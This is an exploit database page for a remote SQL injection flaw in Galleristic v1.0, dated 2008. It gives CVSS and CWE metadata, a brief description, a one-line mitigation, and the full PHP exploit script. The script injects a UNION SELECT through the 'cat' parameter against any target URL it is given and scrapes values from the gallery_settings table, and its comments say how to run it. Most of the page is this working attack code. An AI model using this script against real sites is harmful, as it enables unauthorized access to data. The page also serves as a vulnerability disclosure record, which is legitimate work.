header-logo
Suggest Exploit
vendor:
Galleristic
by:
cOndemned
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Galleristic
Affected Version From: Galleristic v1.0
Affected Version To: Galleristic v1.0
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Galleristic v1.0 (index.php cat) Remote SQL Injection Exploit

Galleristic v1.0 is vulnerable to a remote SQL injection vulnerability. This exploit works only when magic_quotes_gpc is set to off. The exploit is triggered by sending a maliciously crafted HTTP request to the vulnerable application. The exploit code is written in PHP and it takes the target URL as a parameter. It then sends a maliciously crafted HTTP request to the vulnerable application and extracts the value from the gallery_settings table.

Mitigation:

Ensure that the application is not vulnerable to SQL injection attacks by validating user input and using parameterized queries.
Source

Exploit-DB raw data:

<?php

#
#   Name : Galleristic v1.0 (index.php cat) Remote SQL Injection Exploit
#   Author : cOndemned
#   Note : works only when magic_quotes_gpc = off
#   Greetz : irk4z, GregStar, ZaBeaTy, Iwan, ElusiveN, doctor, Avantura ;*
#

function exploit($target, $v) {

    $injection = "/index.php?cat='-1+union+select+value+from+gallery_settings+where+id=" . $v . "/*";
    $request = file($target . $injection);
        
    for($i = 0; $i < count($request); $i++) {
        
        preg_match('/\'(.*)\'<\/h2>/', $request[$i], $response);
           
        if(!empty($response[1])) {
            return $response[1] . '<br />';
        }
    }
}

#   Usage : Run in a browser as : http://[yourbox]/exploit.php?target=http://[targetbox]/[path]/
if(empty($_GET['target'])) {
    die('No target site specified!');
}
else {
    for($c = 1; $c < 3; $c++) {
        echo exploit($_GET['target'], $c);
    }   
}

?>

# milw0rm.com [2008-05-07]

Navigation

Suggest Exploit

Services By CQR